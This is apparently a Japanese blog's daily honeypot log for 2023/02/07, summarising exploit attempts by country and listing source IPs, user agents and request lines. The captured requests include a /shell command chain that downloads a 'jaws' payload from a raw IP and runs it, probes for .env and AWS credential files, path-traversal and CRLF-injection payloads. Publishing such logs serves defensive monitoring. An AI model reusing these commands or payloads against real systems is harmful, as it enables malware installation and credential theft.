コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/02/07 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2023/02/07分です。

特徴
共通

CensysInspectによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

クラウド環境のメタデータ情報を狙うアクセス
zgrabによるスキャン行為
/.awsへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 45.12.253.180/jaws;
sh /tmp/jaws
Location:UK

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:SG

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Comodo Firewall脆弱性(CVE-2018-17431)を狙うアクセス
Dynamicwebの脆弱性(CVE-2022-25369)を狙うアクセス
FCKEditorの脆弱性を狙うアクセス
FortiOSの脆弱性(CVE-2018-13379)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Joomla!脆弱性を狙うアクセス
Linear eMerge E3の脆弱性(CVE-2019-7256)を狙うアクセス
Movable Type脆弱性(CVE-2021-20837)を狙うアクセス
Netgear RAX43の脆弱性(CVE-2021-201667)を狙うアクセス
Oracle WebLogic脆弱性(CVE-2017-3506)を狙うアクセス
Oracle WebLogic脆弱性(CVE-2018-2894)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
SCIMonoの脆弱性(CVE-2021-21479)を狙うアクセス
ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
TerraMaster TOS脆弱性(CVE-2020-28188)を狙うアクセス
WordPress Pluginの脆弱性を狙うアクセス
ZhiyuanOAの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
.sqlへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 45.12.253.180/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget 5.255.105.71/76d32be0.sh;
sh /tmp/76d32be0.sh
cd /tmp;
rm -rf *;
wget 94.158.247.123/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:183 (前日比:-6)
US:総アクセス数:93 (前日比:-31)
UK:総アクセス数:102 (前日比:5)
SG:総アクセス数:1637 (前日比:1534)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
30 3.25.186.251 United States
3 20.150.210.254 United States
1 45.12.253.111 Bulgaria
1 45.56.108.128 United States
2 45.79.128.205 United States
2 45.79.181.104 United States
1 60.217.75.70 China
1 66.240.205.34 United States
4 71.6.199.23 United States
1 79.137.202.2 Russia
2 81.209.147.8 Germany
4 95.214.235.205 Ukraine
3 101.32.209.199 Singapore
2 109.237.97.180 Russia
6 117.187.173.2 China
16 135.125.246.189 France
7 138.91.111.253 United States
71 144.24.4.74 Greece
4 152.32.144.44 Hong Kong
1 167.94.138.61 United States
1 167.94.138.120 United States
1 167.248.133.117 United States
1 172.104.11.34 United States
1 172.104.11.51 United States
1 172.105.128.12 United States
1 172.105.128.13 United States
3 185.224.128.219 Netherlands
1 185.243.218.153 Norway
4 185.254.196.115 Ukraine
1 192.241.225.32 United States
5 207.154.197.170 United States
1 216.218.206.69 United States

UserAgent一覧

件数 UserAgent
28 -
4 Go-http-client/1.1
73 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 8_1_2) AppleWebKit/541.44 (KHTML, like Gecko) Chrome/96.0.937 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 7_2; Win64; x64) AppleWebKit/558.47 (KHTML, like Gecko) Chrome/94.0.601 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
46 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/573.41 (KHTML, like Gecko) Chrome/105.0.1096 Safari/537.36
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
3 python-requests/2.22.0
1 python-requests/2.28.1

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
1 \n
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\t\x01
11 \x16\x03\x01\x02
10 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
1 GET /.c9/metadata/environment/.env HTTP/1.1
1 GET /.docker/.env HTTP/1.1
1 GET /.env.backup HTTP/1.1
1 GET /.env.bak HTTP/1.1
1 GET /.env.dev HTTP/1.1
1 GET /.env.development HTTP/1.1
1 GET /.env.dist HTTP/1.1
1 GET /.env.old HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production HTTP/1.1
1 GET /.env.project HTTP/1.1
1 GET /.env.save HTTP/1.1
1 GET /.env.www HTTP/1.1
1 GET /.env_1 HTTP/1.1
1 GET /.env_sample HTTP/1.1
30 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.json HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?phpinfo=1 HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /PSIA/index HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /_static/.env HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
3 GET /admin/config.php HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /axis2-admin/ HTTP/1.1
1 GET /axis2/ HTTP/1.1
1 GET /axis2/axis2-admin/ HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /cms/.env HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /druid/index.html HTTP/1.1
1 GET /enviroments/.env.production HTTP/1.1
1 GET /enviroments/.env HTTP/1.1
8 GET /favicon.ico HTTP/1.1
1 GET /fedex/.env HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /live_env HTTP/1.1
1 GET /local/.env HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
3 GET /robots.txt HTTP/1.1
1 GET /script/.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
3 GET /sitemap.xml HTTP/1.1
1 GET /sources/.env HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /wp-content/ HTTP/1.1
1 GET http[:]//169[.]254[.]169[.]254/latest/meta-data/ HTTP/1.1
3 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 POST /.aws/credentials HTTP/1.1
1 POST /.c9/metadata/environment/.env HTTP/1.1
1 POST /.docker/.env HTTP/1.1
1 POST /.env.backup HTTP/1.1
1 POST /.env.dev HTTP/1.1
1 POST /.env.development HTTP/1.1
1 POST /.env.dist HTTP/1.1
1 POST /.env.old HTTP/1.1
1 POST /.env.prod HTTP/1.1
1 POST /.env.production HTTP/1.1
1 POST /.env.project HTTP/1.1
1 POST /.env.save HTTP/1.1
1 POST /.env.www HTTP/1.1
1 POST /.env_1 HTTP/1.1
1 POST /.env_sample HTTP/1.1
2 POST /.env HTTP/1.1
1 POST /_static/.env HTTP/1.1
1 POST /admin-app/.env HTTP/1.1
1 POST /api/.env HTTP/1.1
1 POST /app/.env HTTP/1.1
1 POST /application/.env HTTP/1.1
1 POST /apps/.env HTTP/1.1
1 POST /back/.env HTTP/1.1
1 POST /cms/.env HTTP/1.1
1 POST /core/.env HTTP/1.1
1 POST /cp/.env HTTP/1.1
1 POST /development/.env HTTP/1.1
1 POST /docker/.env HTTP/1.1
1 POST /enviroments/.env.production HTTP/1.1
1 POST /enviroments/.env HTTP/1.1
1 POST /fedex/.env HTTP/1.1
1 POST /laravel/.env HTTP/1.1
1 POST /live_env HTTP/1.1
1 POST /local/.env HTTP/1.1
1 POST /onvif/device_service HTTP/1.1
1 POST /private/.env HTTP/1.1
1 POST /rest/.env HTTP/1.1
1 POST /script/.env HTTP/1.1
1 POST /shared/.env HTTP/1.1
1 POST /sources/.env HTTP/1.1
1 POST /system/.env HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.102.43.87 United States
1 35.87.220.112 United States
1 45.79.172.21 United States
2 45.79.181.94 United States
1 45.79.181.104 United States
1 45.79.181.251 United States
1 45.134.140.181 United Kingdom
2 45.227.254.48 Belize
1 51.77.247.119 France
40 51.79.29.48 Canada
1 60.217.75.70 China
1 64.62.197.71 United States
1 79.137.202.2 Russia
1 85.130.138.30 Israel
1 92.118.39.82 Romania
2 92.255.85.173 Hong Kong
1 109.107.166.87 Russia
1 117.212.173.54 India
1 117.243.249.138 India
2 152.89.196.211 Russia
2 159.89.170.91 United States
2 162.142.125.7 United States
2 162.142.125.213 United States
1 169.57.196.28 United States
2 170.64.130.214 United States
1 172.104.11.51 United States
1 172.105.128.12 United States
3 172.105.128.13 United States
1 173.249.56.171 Germany
2 179.43.142.41 Panama
2 179.43.177.242 Panama
1 185.92.73.113 United Kingdom
2 185.202.172.77 Canada
2 185.246.220.98 Bulgaria
1 192.155.90.220 United States
1 192.241.209.112 United States
1 194.49.94.234 Bulgaria
2 194.87.151.116 Czechia
1 205.210.31.151 United States

UserAgent一覧

件数 UserAgent
27 -
2 Go-http-client/1.1
1 Hello World
1 Hello, world
1 Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 9; LG-H930) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3792.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
40 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
1 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 curl/7.64.0
1 python-requests/2.20.1

リクエスト内容一覧

件数 Method Request Protocol
1 -
5 \x03
17 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT www[.]google[.]com:443 HTTP/1.1
42 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /apis/apps/v1/namespaces/kube-system/daemonsets HTTP/1.1
2 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /cgi-bin/downloadFlile.cgi HTTP/1.1
1 GET /druid/index.html HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /local/ HTTP/1.1
2 GET /sendgrid.env HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+45[.]12[.]253[.]180/jaws;sh+/tmp/jaws HTTP/1.1
6 POST /boaform/admin/formLogin HTTP/1.1
1 POST /dev/.env HTTP/1.1
2 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.144.211.234 United States
3 43.158.217.52 Singapore
1 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.251 United States
1 47.88.101.3 United States
1 47.254.16.187 United States
1 47.254.85.182 United States
46 51.79.29.48 Canada
1 52.146.17.145 United States
1 52.146.21.242 United States
1 60.217.75.70 China
1 61.152.208.188 China
1 64.62.197.83 United States
3 79.137.202.2 Russia
1 92.118.39.82 Romania
1 107.170.254.19 United States
2 109.237.97.180 Russia
1 113.160.222.61 Vietnam
2 152.89.196.211 Russia
2 162.142.125.121 United States
2 165.22.232.54 United States
2 167.94.138.63 United States
2 167.99.14.106 United States
1 172.104.11.4 United States
2 172.104.11.46 United States
1 172.104.11.51 United States
1 172.105.128.11 United States
1 172.105.128.12 United States
3 179.43.177.242 Panama
1 180.149.125.159 Mongolia
3 185.180.143.80 Portugal
1 185.224.128.219 Netherlands
1 185.246.220.98 Bulgaria
1 192.155.90.118 United States
2 192.155.90.220 United States
1 194.87.151.116 Czechia
2 194.165.16.71 Panama
1 198.235.24.144 United States
1 222.142.206.125 China

UserAgent一覧

件数 UserAgent
27 -
3 Go-http-client/1.1
1 Hello World
1 Hello, World
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 11; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
48 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
2 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 python-requests/2.22.0
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
1 -
2 \x03
1 \x16\x03\x01\x01H\x01
18 \x16\x03\x01
1 \xff\xa2\xff
1 o\xfa\xc0\xbe\xb8\xc0\xa4\xc9\x89\xa2\xc2\x8f\x83\xaf\x91\x97\xbe\xcd\xb9\xcf\xac\x9b\xb0\xab\xa0\xb6\xb1\xaa\x9d\x9c\x9f\x96\x8d\x93\xce\xb4\xb3\xb5\x98\xcd\xa6\xfa\xfa\xfa\xfa\x12\xfd\xd8\xf8\xfa\xfa\xc2\xfa\xfa\xfa\xfa\x1af\xec\xf9\xfa\xfa\xfa\xfa\xfb\xe5q\xf2\xfa\xfa\xfa\xfa\xfa\xfa\xf9wh\x97ui\xba\xea=E\xf0\x1b/\xa7XJ\xf11Y\v\xbf\xb1K\x1f
3 CONNECT google[.]com:443 HTTP/1.1
1 GET /.ebextensions/ HTTP/1.1
48 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/ HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /cgi-bin/downloadFlile.cgi HTTP/1.1
1 GET /controllers/ HTTP/1.1
1 GET /druid/index.html HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
5 POST /boaform/admin/formLogin HTTP/1.1
2 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.84.48.39 United States
1 27.129.129.231 China
1 45.33.80.243 United States
1 45.56.108.128 United States
1 45.79.181.94 United States
1 45.79.181.179 United States
1529 45.113.0.46 Hong Kong
45 51.79.29.48 Canada
1 60.217.75.70 China
1 60.221.224.27 China
1 64.62.197.10 United States
1 69.194.182.218 United States
2 79.137.202.2 Russia
1 91.223.227.140 Ukraine
2 109.237.97.180 Russia
1 114.247.113.149 China
2 116.85.5.242 China
2 152.89.196.211 Russia
2 162.142.125.9 United States
2 165.227.230.66 United States
2 167.94.138.118 United States
2 170.64.160.67 United States
1 172.104.11.4 United States
1 172.104.11.34 United States
2 172.104.11.46 United States
1 172.104.11.51 United States
1 172.105.128.11 United States
1 172.105.128.12 United States
1 176.113.115.168 Russia
2 179.43.177.242 Panama
1 180.149.125.159 Mongolia
6 183.136.225.32 China
2 185.224.128.219 Netherlands
3 185.246.220.98 Bulgaria
2 192.155.90.220 United States
2 194.87.151.116 Czechia
2 194.165.16.78 Panama
4 195.154.56.158 France
1 196.207.151.238 Kenya
1 198.235.24.146 United States
1 223.82.203.42 China

UserAgent一覧

件数 UserAgent
37 -
2 Go-http-client/1.1
5 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
39 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
65 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
35 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
38 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
37 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
53 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
51 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
48 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
38 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
56 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
45 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
37 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; rv:104.0) Gecko/20100101 Firefox/104.0
47 Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
51 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
59 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
44 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
54 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
53 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
45 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
56 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
42 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
47 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
61 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
58 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
37 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
36 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
44 Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
54 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
40 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
47 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
46 Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
53 Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
47 Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 curl/7.29.0
1 curl/7.79.1
2 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
3 \x03
1 \x16\x03\x01\x01H\x01
18 \x16\x03\x01
2 CONNECT google[.]com:443 HTTP/1.1
1 DEBUG /Foobar-debug.aspx HTTP/1.1
1 DELETE /actuator/gateway/routes/2LM9bCdJMpTvVs7gW5Xh6fOlbgp HTTP/1.1
1 GET /%20http[:]//13[.]67[.]44[.]234///bin///querybuilder[.]feed[.]servlet HTTP/1.1
1 GET /%250ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1
1 GET /%250D%250ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1
1 GET /%250DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1
1 GET /%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252fetc/passwd HTTP/1.1
1 GET /%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e/etc/passwd HTTP/1.1
1 GET /%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows/win.ini HTTP/1.1
1 GET /%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
1 GET /%253F%250DSet-Cookie%253Acrlfinjection=crlfinjection HTTP/1.1
1 GET /%255C../%255C../%255C../%255C../%255C../%255C../%255C../%255C../%255C../%255C../%255C../windows/win.ini HTTP/1.1
1 GET /%255C../ssl/yaws-key.pem HTTP/1.1
1 GET /%255cgoogle.com/evil.html HTTP/1.1
1 GET /%25E5%2598%258D%25E5%2598%258ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1
1 GET /%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini HTTP/1.1
1 GET /%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini%2500 HTTP/1.1
1 GET /%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini HTTP/1.1
1 GET /%7BBaseURL%7D%7D/redmine/config/initializers/secret_token.rb HTTP/1.1
